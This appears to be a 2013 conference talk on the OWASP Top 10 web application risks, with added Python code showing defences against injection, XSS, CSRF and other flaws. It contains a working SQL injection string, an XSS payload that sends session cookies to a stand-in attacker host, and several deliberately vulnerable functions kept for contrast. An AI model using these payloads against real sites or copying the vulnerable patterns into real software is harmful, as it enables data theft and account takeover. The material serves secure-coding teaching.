Oh, WASP! Security Essentials for Web Apps

The past few years have seen a rapid increase in business efficiency through web-based applications. Unfortunately, a dramatic increase in the number of web application vulnerabilities has followed. Insecure web applications can be disastrous for mission-critical businesses and for users' sensitive data. More than 70 percent of security vulnerabilities are due to flaws in the application rather than to firewall breaches. Benny Paul explains how security testing has become an indispensable part of the SDLC for businesses operating online today. OWASP (the Open Web Application Security Project) provides open source tools, code, and materials to develop, test, and maintain application security. Monitoring the "OWASP Top 10" web application security flaws is highly recommended as part of an organization's testing methodology. Vulnerabilities identified are compared against the organization's security objectives and regulations, and categorized accordingly for remediation. Benny guides you through the OWASP vulnerabilities, techniques, framework, and preventive measures that you can adopt for building better software.


Oh, WASP! Security Essentials for Web Apps

  1. BW8 Concurrent Session, 11/13/2013, 2:15 PM. "Oh, WASP! Security Essentials for Web Apps". Presented by: Benny Paul, Cognizant Technology Solutions. Brought to you by: 340 Corporate Way, Suite 300, Orange Park, FL 32073; 888 268 8770; 904 278 0524; sqeinfo@sqe.com; www.sqe.com
  2. Benny Paul, Cognizant Technology Solutions. Benny Paul brings more than fifteen years of IT experience to Cognizant Testing Services, where he is responsible for program management, strategic planning, and delivery of QA services. Benny is experienced in building and managing large-scale QA programs in multiple domains, with a resolute focus on improving QA maturity practices, enhancing quality engineering and delivery, incorporating optimization techniques, and implementing practical and effective process improvement methods. Benny's passion for business development, maintaining customer relationships, and people management through motivation and inspiration further contributes to his ability to manage large programs and deliver business value to Cognizant's global clients.
  3. Oh, WASP! Security Essentials for Web Apps. Benny Paul, Cognizant Testing Services, Nov 11, 2013. 1 | ©2013, Cognizant
  4. Introduction
     Purpose of session:
     - Provide an overview of web application security
     - OWASP Top 10
     What is web application security?
     - A brief discussion
     - Attackers' hot spots
     Top security problems on the web today:
     - Recent nightmares
     - Some statistics
     Understand the OWASP 2013 Top 10 vulnerabilities:
     - Define the vulnerabilities
     - How do we protect against them?
     www.owasp.org
  5. Credits & References
     - Documents copyrighted Open Web Application Security Project, and freely downloaded from www.owasp.org.
     - OWASP Top Ten, titled "The Ten Most Critical Web Application Security Vulnerabilities", 2013 update: https://www.owasp.org/index.php/Top_10_2013-Top_10
     - The OWASP Tutorial Series by Jerry Hoff: https://www.owasp.org/index.php/Main_Page, https://www.owasp.org/index.php/OWASP_Appsec_Tutorial_Series
     - Several application security testing related sites and content on the web, like iTeach etc.
  6. What is Web Application Security?
     - Not network security
     - Starts in the initial planning stages
     - Continues through coding, testing, and deployment
     - Doesn't finish until the lifecycle is completely finished
     Likelihood of a successful web application attack:
     - A web application is attacked on average once every three days
     - Easy to exploit without special tools or knowledge
     - Little chance of being detected
     Consequences:
     - Unauthorized access to web and application servers
     - Database corruption and disclosure of contents
     - Breach of user authentication and access control
     - Website defacement
  7. Who are we up against? (Chart on slide: Percentage of Websites Vulnerable, by Class.)
     Who                                    What                                  Why
     Organized Crime                        Data & Identity Theft                 Cash
     Espionage (Nation State & Corporate)   Data Theft & Intellectual Property    Competitive Advantage
     Hackers / Script Kiddies               Defacement & Denial of Service        Ego & Credibility building
  8. Most sites are not secure... An attacker can access unauthorized data and attack your users through your website!
  9. Look at the web app through the eyes of an attacker.
  10. Hot spots for an attacker.
  11. Recent Security Flaws...
     - Real attack on the Australian Tax Office: the attacker changed the tax id in the URL and got information on 17,000 companies.
     - "Bank Website Hacked!", Aug 15, 2013: http://articles.timesofindia.indiatimes.com/2013-08-15/delhi/41412603_1_bank-accountsarun-kumar-machines
  12. So, how can we fix this?
  13. OWASP - What is that? Open Web Application Security Project, www.owasp.org
     - International not-for-profit charitable open source organization
     - Top Ten
     - Guides towards building secure web apps: application testing, code reviews
     - OWASP resources and community: documentation & wiki, code projects, chapters, conferences
     - Participation in OWASP is free and open to all!
  14. Most Critical Web App Security Risks: https://www.owasp.org/index.php/Top_10_2013-Top_10
  15. OWASP Top 10 Risks: 1 - Injection
  16. 1 - Injection. Risk rating: easy to exploit, common, critical impact. https://www.owasp.org/index.php/Top_10_2013-A1-Injection
  17. 1 - Injection. Example (Java, from the slide): the request parameter is concatenated straight into the SQL string.
     String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
     With id=209907, the web server sends the DB:
     String query = "SELECT * FROM accounts WHERE custID='" + "209907" + "'";   // returns 1 row
     With id=209907' or '1'='1, the attacker's input becomes part of the SQL:
     String query = "SELECT * FROM accounts WHERE custID='" + "209907' or '1'='1" + "'";   // WHERE clause is always true: returns every row
  18. 1 - Injection. How do I prevent injection?
     - Use parameterized queries
     - Stored procedures instead of dynamic SQL (only helps if the procedure itself does not build dynamic SQL)
     - OWASP ESAPI
     - Whitelist input validation
     https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
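The same lookup in Python against an in-memory SQLite table, as an added example: this is not code from the slides or from OWASP, and the table, rows and customer ids are constructed for the demo. The concatenating function reproduces the slide's failure with the "209907' or '1'='1" payload, the parameterized version returns nothing for it, and a digits-only whitelist check is layered in front as the cheat sheet recommends.

```python
import sqlite3


def make_db():
    """Constructed demo data: a tiny 'accounts' table like the one on the slide."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (custID TEXT, owner TEXT, balance INTEGER)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("209907", "alice", 1200), ("209908", "bob", 55), ("209909", "carol", 990)],
    )
    return conn


def lookup_vulnerable(conn, cust_id):
    """Same pattern as the slide's Java snippet: untrusted input concatenated into SQL."""
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, cust_id):
    """Parameterized query: the value travels separately from the SQL text and is
    never parsed as SQL, so quotes or OR clauses inside it cannot change the query."""
    return conn.execute("SELECT * FROM accounts WHERE custID=?", (cust_id,)).fetchall()


def is_valid_cust_id(cust_id):
    """Whitelist validation as a second layer: a customer id is 1-12 digits, nothing else."""
    return isinstance(cust_id, str) and cust_id.isdigit() and 1 <= len(cust_id) <= 12


def lookup_defended(conn, cust_id):
    """What the request handler should call: validate first, then bind the parameter."""
    if not is_valid_cust_id(cust_id):
        raise ValueError("invalid customer id")
    return lookup_parameterized(conn, cust_id)


if __name__ == "__main__":
    db = make_db()
    attack = "209907' or '1'='1"   # the slide's payload, sent as the 'id' parameter
    print(len(lookup_vulnerable(db, "209907")), "row(s) for a normal id")
    print(len(lookup_vulnerable(db, attack)), "row(s) with the injected id: every account")
    print(len(lookup_parameterized(db, attack)), "row(s) when the same payload is bound as a parameter")
```

The validation step is not a substitute for binding: a field that legitimately contains quotes (a surname, free text) cannot be whitelisted this tightly, and the parameterized query is what protects it.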
  19. OWASP Top 10 Risks: 2 - Broken Authentication & Session Management
  20. 2 - Broken Authentication & Session Management
     - Authentication credentials aren't protected when stored, using hashing or encryption
     - Weak account management functions
     - Session IDs are exposed in the URL
     - Session IDs don't time out, and don't rotate after login
  21. 2 - Broken Authentication & Session Management
     Scenario 1 - Session id in the URL: http://myairline.com/sale/saleitems;jsessionid=47HDFKWkJDS8723HAUG12HG?dest=Sydney
     - An authenticated user shares the airline offer (the link)
     - The link carries his session id, since the app supports URL rewriting
     - When friends open the link, they have access to his session, credit card, etc.
     Scenario 2 - Improper application timeouts
     - User accesses the site on a public computer
     - Closes the browser instead of logging out
     - An attacker uses the same browser shortly after; the session is still authenticated
     Scenario 3 - No restriction on login attempts
     - In 2009, an attacker gained admin access to a Twitter server because there was no restriction on the number of login attempts
     - The attacker targeted a support staff member's password using brute force
     - Gained admin access to 33 accounts belonging to celebrities and politicians
  22. 2 - Broken Authentication & Session Management. How do I prevent authentication and session related risks?
     A single set of strong authentication and session management controls. Such controls should strive to:
     - Meet all the authentication and session management requirements defined in OWASP's Application Security Verification Standard (ASVS), areas V2 (Authentication) and V3 (Session Management). https://www.owasp.org/index.php/ASVS
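An added example, not from the slides or from the ASVS: a minimal server-side session manager in Python that addresses the three scenarios above. The id is random and travels only in a Secure/HttpOnly cookie (never the URL), idle sessions expire on the server, the id is rotated at login, and repeated failed logins lock the account. The password store, the user "alice", and the timeout and lockout values are assumptions for the demo; a real system uses a random salt per user and takes these values from policy.

```python
import hashlib
import hmac
import secrets
import time

IDLE_TIMEOUT = 15 * 60      # seconds of inactivity before a session dies (assumed policy value)
MAX_FAILED_LOGINS = 5       # consecutive failures before a lockout (assumed policy value)
LOCKOUT_SECONDS = 15 * 60

# Constructed credential store: a salted PBKDF2 hash, never the clear-text password.
# Assumption: a real system uses a distinct random salt per user.
_SALT = b"demo-salt-per-user"
_USERS = {"alice": hashlib.pbkdf2_hmac("sha256", b"correct horse", _SALT, 100_000)}


def check_password(username, password):
    """Hash the candidate the same way and compare in constant time."""
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 100_000)
    stored = _USERS.get(username)
    return stored is not None and hmac.compare_digest(stored, digest)


class SessionManager:
    """Server-side session store. Ids are random, live only in a cookie (never the
    URL, so scenario 1 cannot happen), expire when idle, and rotate at login."""

    def __init__(self, clock=time.time):
        self.clock = clock
        self.sessions = {}   # session id -> {"user": ..., "last_seen": ...}
        self.failed = {}     # username -> (consecutive failures, time of first failure)

    def new_session(self, user=None):
        sid = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG: unguessable
        self.sessions[sid] = {"user": user, "last_seen": self.clock()}
        return sid

    @staticmethod
    def cookie_header(sid):
        """Secure: sent only over HTTPS. HttpOnly: not readable by script (limits XSS theft)."""
        return "Set-Cookie: SESSIONID=%s; Secure; HttpOnly; SameSite=Lax; Path=/" % sid

    def get(self, sid):
        """Return the session, or None if unknown or idle too long (scenario 2: the
        server forgets the session even though the browser on the shared PC did not)."""
        s = self.sessions.get(sid)
        if s is None:
            return None
        if self.clock() - s["last_seen"] > IDLE_TIMEOUT:
            del self.sessions[sid]
            return None
        s["last_seen"] = self.clock()
        return s

    def login(self, pre_login_sid, username, password):
        """Authenticate with lockout (scenario 3) and rotate the session id on success."""
        now = self.clock()
        count, first = self.failed.get(username, (0, 0.0))
        if count >= MAX_FAILED_LOGINS and now - first < LOCKOUT_SECONDS:
            return None                       # locked out: brute force stops here
        if not check_password(username, password):
            if count == 0 or now - first >= LOCKOUT_SECONDS:
                self.failed[username] = (1, now)
            else:
                self.failed[username] = (count + 1, first)
            return None
        self.failed.pop(username, None)
        # Rotate: discard the pre-login id (an attacker may know it) and issue a fresh one.
        self.sessions.pop(pre_login_sid, None)
        return self.new_session(user=username)

    def logout(self, sid):
        self.sessions.pop(sid, None)
```

The lockout here is per username; in production it should also be counted per source address and surfaced to monitoring, because a single locked account is exactly the signal a brute-force attempt produces.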
  23. OWASP Top 10 Risks: 3 - Cross Site Scripting (XSS)
  24. 3 - Cross Site Scripting (XSS). XSS is aimed at other users' browsers.
  25. 3 - Cross Site Scripting (XSS). Using JavaScript injected into the page, an attacker can steal the session ID / cookie, rewrite web pages, etc.
  26. 3 - Cross Site Scripting (XSS). How do I prevent XSS?
     - Data escaping techniques
     - Contextual encoding
     - Auto-sanitization libraries
     - Content Security Policy (CSP)
     - Whitelist input validation
     https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
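An added example of contextual encoding in Python, not code from the slides or from the OWASP cheat sheet: one encoder per output context (HTML body, quoted attribute, JavaScript string, URL parameter), a template that uses the right one in each place, and a nonce-based Content Security Policy header so that an injected script tag without the nonce does not execute. The page layout and the payload are constructed for the demo.

```python
import html
import json
import secrets
from urllib.parse import quote


def encode_html_body(value):
    """For text between tags: & < > " ' become entities, so no tag can start."""
    return html.escape(value, quote=True)


def encode_html_attr(value):
    """For a value inside a quoted attribute; the template must always quote the attribute."""
    return html.escape(value, quote=True)


def encode_js_string(value):
    """For a value inside a JavaScript string literal in a <script> block.
    json.dumps yields a quoted, backslash-escaped literal with non-ASCII (including
    the U+2028/2029 line terminators) as \\uXXXX; '<' and '>' are escaped as well so
    a '</script>' inside the data cannot close the element early."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def encode_url_param(value):
    """For a value inside a query string."""
    return quote(value, safe="")


def csp_header(nonce):
    """Content Security Policy allowing only same-origin scripts plus inline scripts
    carrying this request's nonce; an injected <script> without the nonce does not run."""
    return ("Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-%s'; "
            "object-src 'none'" % nonce)


def render_profile(display_name, bio, nonce):
    """Assumed page layout: each untrusted value is encoded for the context it lands in."""
    return (
        '<h1 title="%s">%s</h1>\n' % (encode_html_attr(display_name), encode_html_body(display_name))
        + "<p>%s</p>\n" % encode_html_body(bio)
        + '<a href="/search?q=%s">search</a>\n' % encode_url_param(display_name)
        + '<script nonce="%s">var name = %s;</script>' % (nonce, encode_js_string(display_name))
    )


if __name__ == "__main__":
    payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
    nonce = secrets.token_urlsafe(16)   # fresh per response; never reused
    print(csp_header(nonce))
    print(render_profile(payload, 'Hello "world"', nonce))
```

The attribute encoder only works because the template always wraps the value in quotes; an unquoted attribute can be broken out of with a space, which html.escape does not touch. Contexts not covered here (CSS, a URL in href that may start with javascript:, an event handler) need their own rules from the cheat sheet.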
  27. OWASP Top 10 Risks: 4 - Insecure Direct Object References
  28. 4 - Insecure Direct Object References. Unauthorized access to objects through parameter tampering.
  29. 4 - Insecure Direct Object References. (Diagram on slide with six numbered steps; no text.)
  30. 4 - Insecure Direct Object References. How do I prevent?
     - Avoid exposing your private object references to users
     - Validate any private object references
     - Verify authorization to all referenced objects
     - Use session indirect object references (a per-session map from random values to the real ids)
  31. OWASP Top 10 Risks: 5 - Security Misconfiguration
  32. 5 - Security Misconfiguration. Web apps exposing server error messages on screen; default accounts.
  33. 5 - Security Misconfiguration. Unprotected website directories (directory listing enabled).
  34. 5 - Security Misconfiguration. How do I prevent?
     - Directory listing disabled on your server
     - Disable stack traces from being returned to users
     - Identical configuration of Dev, QA & Prod, properly locked down, with different passwords
     - Periodic scans & audits to detect misconfigurations
     From OWASP: Development Guide, chapter on Configuration: https://www.owasp.org/index.php/Configuration. Testing Guide, Configuration Management: https://www.owasp.org/index.php/Testing_for_configuration_management
  35. OWASP Top 10 Risks: 6 - Sensitive Data Exposure
  36. 6 - Sensitive Data Exposure. Sensitive data not protected properly!
  37. 6 - Sensitive Data Exposure. Example 1: HTTPS only during login (https://OfficeEmail.com), with the rest of the session over plain HTTP (HTTP -> HTTPS -> HTTP), so the session cookie and mail content travel in the clear. Example 2: man-in-the-middle attack (diagram on slide).
  38. 6 - Sensitive Data Exposure. How do I prevent?
     - Strict Transport Security in the HTTP response header (the browser converts HTTP requests to HTTPS)
     - Secured sites should switch entirely to HTTPS
     - Encrypt all sensitive data
     - Don't store sensitive data unnecessarily; discard it
     - Disable autocomplete on forms
     https://www.owasp.org/index.php/Cryptographic_Storage_Cheat_Sheet
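An added example in Python of the first, second, fourth and fifth bullets, not code from the slides: a request handler that redirects every plaintext request to HTTPS and then sends the HSTS header and a Secure/HttpOnly session cookie, a login form with autocomplete disabled, and a helper that keeps only the last four digits of a card number. The request shape, host name, card number and max-age value are assumptions constructed for the demo.

```python
HSTS_MAX_AGE = 31536000   # one year, in seconds (assumed policy value)


def handle(request):
    """Assumed request shape: {'scheme', 'host', 'path', optional 'session_id'}.
    Returns (status, headers, body)."""
    if request["scheme"] != "https":
        # The whole site is HTTPS, not just the login page: a plaintext request is
        # redirected before any cookie or page content is sent over it.
        return 301, [("Location", "https://%s%s" % (request["host"], request["path"]))], b""
    headers = [
        # HSTS is only honoured when received over HTTPS; from then on the browser
        # rewrites http:// links to https:// itself for max-age seconds.
        ("Strict-Transport-Security", "max-age=%d; includeSubDomains" % HSTS_MAX_AGE),
        # Sensitive responses must not land in shared caches or on-disk browser caches.
        ("Cache-Control", "no-store"),
    ]
    if "session_id" in request:
        # The session cookie is never sent over plaintext and never readable by script.
        headers.append(("Set-Cookie", "SESSIONID=%s; Secure; HttpOnly; SameSite=Lax; Path=/"
                        % request["session_id"]))
    return 200, headers, b"<html>...</html>"


def login_form_html():
    """Credential fields with autocomplete disabled (the slide's last bullet)."""
    return (
        '<form method="post" action="/login">'
        '<input name="user" autocomplete="off">'
        '<input name="password" type="password" autocomplete="off">'
        '<button>Sign in</button></form>'
    )


def retain_for_receipt(pan):
    """'Don't store sensitive data unnecessarily': keep only the last four digits of a
    card number for the receipt and discard the rest before anything is persisted."""
    digits = "".join(ch for ch in pan if ch.isdigit())
    if len(digits) < 13:
        raise ValueError("not a card number")
    return "*" * (len(digits) - 4) + digits[-4:]
```

Two caveats a practitioner should keep in mind: the first visit is still over HTTP until the redirect lands (HSTS preloading closes that window), and browsers ignore an HSTS header that arrives over plain HTTP, which is why the redirect has to come first.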
  39. OWASP Top 10 Risks: 7 - Missing Function Level Access Control
  40. 7 - Missing Function Level Access Control. The UI shows (or merely hides) navigation to unauthorized functions, and there is no server-side authentication or authorization check. Example: access to unauthorized functions by editing the URL, from http://example.com/app/getappInfo to http://example.com/app/admin_getappInfo
  41. 7 - Missing Function Level Access Control. How do I prevent?
     - Don't rely on "presentation layer access control" (hiding links); enforce the checks at the controller or business logic layer
     - Define specific roles for access to every function
     - Establish a solid process for managing entitlements
     OWASP offers: ESAPI Access Control API: http://owasp-esapi-java.googlecode.com/svn/trunk_doc/latest/org/owasp/esapi/AccessController.html. OWASP Development Guide, chapter on Authorization: https://www.owasp.org/index.php/Guide_to_Authorization. Testing Guide, Testing for Path Traversal: https://www.owasp.org/index.php/Testing_for_Path_Traversal
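An added example, not from the slides or from ESAPI, covering both the object-level checks of risk 4 (the id parameter on slides 28 to 30) and the function-level checks of this slide: a direct lookup that any logged-in user can tamper with, the ownership check that fixes it, a per-session indirect reference map, and a role check enforced by the controller rather than by hiding the admin link. The accounts, users and roles are constructed for the demo.

```python
import secrets

# Constructed demo data: who owns which account, and who holds which roles.
ACCOUNTS = {
    "1001": {"owner": "alice", "balance": 1200},
    "1002": {"owner": "bob", "balance": 55},
}
ROLES = {"alice": {"user"}, "bob": {"user"}, "root": {"user", "admin"}}


class Forbidden(Exception):
    """Raised when a request fails an authorization check."""


# ---- Risk 4: object-level checks (the ?id=... parameter) ----------------------

def get_account_direct_unchecked(session, acct_id):
    """Vulnerable: the id from the URL is looked up as-is; any logged-in user can
    read any account just by changing the number (parameter tampering)."""
    return ACCOUNTS[acct_id]


def get_account_checked(session, acct_id):
    """Fixed: the referenced object must belong to the session's user."""
    acct = ACCOUNTS.get(acct_id)
    if acct is None or acct["owner"] != session["user"]:
        raise Forbidden("account not accessible")
    return acct


class IndirectRefs:
    """Session indirect object references: the page shows random tokens instead of
    real ids, and only tokens this session handed out can be resolved."""

    def __init__(self):
        self._by_token = {}

    def ref(self, real_id):
        token = secrets.token_urlsafe(8)
        self._by_token[token] = real_id
        return token

    def resolve(self, token):
        if token not in self._by_token:
            raise Forbidden("unknown reference")
        return self._by_token[token]


# ---- Risk 7: function-level checks (admin_getappInfo vs getappInfo) ----------

def require_role(role):
    """Decorator enforcing the role at the controller, whether or not the UI showed the link."""
    def decorate(fn):
        def wrapper(session, *args, **kwargs):
            if role not in ROLES.get(session["user"], set()):
                raise Forbidden("role %r required" % role)
            return fn(session, *args, **kwargs)
        return wrapper
    return decorate


@require_role("user")
def get_app_info(session):
    return {"version": "1.0"}


@require_role("admin")
def admin_get_app_info(session):
    return {"version": "1.0", "db_host": "db.internal"}


def is_denied(fn, *args):
    """True if the call is refused with Forbidden; handy for checking tampering cases."""
    try:
        fn(*args)
        return False
    except Forbidden:
        return True
```

The indirect map removes the enumeration problem (a user cannot guess another account's token), but it does not replace the ownership check: the token still has to be resolved against data the session is entitled to, and the resolved id must still be authorized before use.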
  42. OWASP Top 10 Risks: 8 - Cross Site Request Forgery (CSRF)
  43. 8 - Cross Site Request Forgery (CSRF). Forged HTTP requests. Easy to detect via penetration testing.
  44. 8 - Cross Site Request Forgery (CSRF). Example:
     1. The victim browses a page from Evil.org.
     2. Evil.org has crafted an HTML image element whose source references a script on the victim's bank's website (rather than an image file).
     3. If the victim's bank stores his authentication information in a cookie, and the cookie hasn't expired, then the victim's browser's attempt to load the image submits the withdrawal request with his cookie, authorizing a transaction without the victim's approval.
  45. 8 - Cross Site Request Forgery (CSRF). How do I prevent CSRF?
     - Include an unpredictable, unique token in each state-changing HTTP request
     - Put the token in a hidden form field rather than in the URL
     - Require re-authentication, or proof that a user is present (e.g. a CAPTCHA), for sensitive operations
     OWASP offers: CSRFGuard, to include such tokens in Java EE, .NET, or PHP apps: https://www.owasp.org/index.php/CSRFGuard
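An added example, not from the slides or from CSRFGuard: a session-bound token (an HMAC over the session id and a nonce, under a server secret) placed in a hidden field, and a withdrawal handler that refuses the forged image GET from the slide, refuses a POST without a valid token, and accepts the bank's own form. The request shape, session table and secret are assumptions for the demo; this stateless HMAC scheme is one of several valid token designs, and CSRFGuard uses its own.

```python
import hashlib
import hmac
import secrets

SECRET_KEY = secrets.token_bytes(32)   # assumed per-deployment server secret; kept out of source in reality


def make_csrf_token(session_id):
    """Unpredictable token bound to the session: nonce + HMAC(secret, session_id:nonce).
    It goes in a hidden form field (not the URL) so it does not leak via Referer or logs."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, ("%s:%s" % (session_id, nonce)).encode(), hashlib.sha256).hexdigest()
    return nonce + "." + mac


def verify_csrf_token(session_id, token):
    """Recompute the MAC for this session and compare in constant time."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(SECRET_KEY, ("%s:%s" % (session_id, nonce)).encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def withdraw_form(session_id):
    """The bank's real form carries the token; a page on evil.org cannot read it
    (same-origin policy), so it cannot forge a request that passes the check."""
    return (
        '<form method="post" action="/withdraw">'
        '<input type="hidden" name="csrf" value="%s">' % make_csrf_token(session_id)
        + '<input name="amount"><button>Withdraw</button></form>'
    )


def handle_withdraw(request, sessions):
    """Assumed request shape: {'method', 'cookies', 'form'}; sessions: sid -> {'user', 'balance'}."""
    sid = request["cookies"].get("SESSIONID")
    session = sessions.get(sid)
    if session is None:
        return 401, "not logged in"
    if request["method"] != "POST":
        # The slide's image trick issues a GET; state changes are refused on GET.
        return 405, "state change requires POST"
    if not verify_csrf_token(sid, request["form"].get("csrf")):
        # The browser attached the victim's cookie, but the forged request has no valid token.
        return 403, "missing or invalid CSRF token"
    amount = int(request["form"]["amount"])
    session["balance"] -= amount
    return 200, "withdrew %d" % amount
```

Refusing GET is necessary but not sufficient: an attacker's page can auto-submit a hidden POST form to the bank just as easily, and only the token check stops that one.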
  46. OWASP Top 10 Risks: 9 - Using Components with Known Vulnerabilities
  47. 9 - Using Components with Known Vulnerabilities. Weak external components, themselves vulnerable to injection, broken access control, XSS, etc.
  48. 9 - Using Components with Known Vulnerabilities. Components built by other developers (dependency developers): web toolkits, widgets, runtime engines, web servers, framework libraries, etc.
     Example: the following two vulnerable components were downloaded 22 million times in 2011. Every application using them is vulnerable to attack, as both components are directly accessible by application users:
     - Apache CXF Authentication Bypass
     - Spring Remote Code Execution
  49. 9 - Using Components with Known Vulnerabilities. How do I prevent?
     - Keep an inventory of the components you use and their versions, including nested dependencies, so you know what to upgrade
     - Upgrade to newer versions
     - Establish security policies governing component use, like requiring certain software development practices, passing security tests, and acceptable licenses
     OWASP references: https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities
  50. OWASP Top 10 Risks: 10 - Unvalidated Redirects & Forwards
  51. 10 - Unvalidated Redirects & Forwards. Easy to detect.
  52. 10 - Unvalidated Redirects & Forwards. Example:
     1. The user receives a trusted email containing a legitimate-looking link
     2. Hovering over the link shows the legitimate website, www.trustedsite.com
     3. Clicking the link redirects to www.evilsite.com
  53. 10 - Unvalidated Redirects & Forwards. How do I prevent?
     - Simply avoid using redirects and forwards
     - If used, don't involve user parameters in calculating the destination
     - If the parameter can't be avoided, validate it against an allow-list or map it to a server-side destination; OWASP ESAPI can override the redirect call so that every destination is checked
     OWASP references: https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards
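An added example in Python, not the slides' or ESAPI's code, of the two defensive options: validating a user-supplied destination so that only a same-site path (or an exactly allow-listed host) is accepted, and replacing the URL parameter with a key into a server-side table. The protocol-relative, backslash and user-info spellings of the evilsite URL are handled because those are the bypasses an attacker tries first. The allow-list and the table are assumptions for the demo.

```python
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"www.trustedsite.com"}   # the slide's example host; assumed allow-list

# Assumed server-side table: the request carries only the key, never a URL.
REDIRECT_MAP = {"home": "/", "offers": "/sale/saleitems", "partner": "https://www.trustedsite.com/"}


def redirect_vulnerable(target):
    """Open redirect: whatever the user supplied becomes the Location header."""
    return 302, target


def safe_redirect_target(target, default="/"):
    """Accept only a same-site absolute path; anything else falls back to the default."""
    if not isinstance(target, str) or not target:
        return default
    t = target.replace("\\", "/")           # browsers treat '\' like '/', so '/\evil' is '//evil'
    parts = urlsplit(t)
    if parts.scheme or parts.netloc:
        return default                       # http://evil, javascript:, //evil (protocol-relative)
    if not t.startswith("/") or t.startswith("//"):
        return default                       # must be a path on this site
    if "\r" in t or "\n" in t:
        return default                       # would split the Location header
    return t


def safe_redirect_target_allowlist(target, default="/"):
    """Variant for the few cases where an external host is legitimate: exact host match,
    and no user-info trick such as https://www.trustedsite.com@www.evilsite.com."""
    if isinstance(target, str):
        parts = urlsplit(target.replace("\\", "/"))
        if (parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS
                and "@" not in parts.netloc):
            return target
    return safe_redirect_target(target, default)


def redirect_by_key(key, default="/"):
    """Indirect destination: the user-visible parameter is a key into a server-side table."""
    return REDIRECT_MAP.get(key, default)
```

The host comparison is exact on purpose: a prefix or substring match lets www.trustedsite.com.evilsite.com or www.evilsite.com/www.trustedsite.com through, which is how the slide's phishing link works.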
  54. OWASP - A great start for your web app security!
     - Read the OWASP Top Ten paper!
     - Get developers trained in web app security
     - Try OWASP WebGoat to learn how flaws work
     - Define security rules for your application
     - Get expert code review and penetration tests periodically
  55. Most Critical Web App Security Risks. Free download available at OWASP.org: https://www.owasp.org/index.php/Top_10_2013-Top_10
  56. Thank you for your time. Any questions?
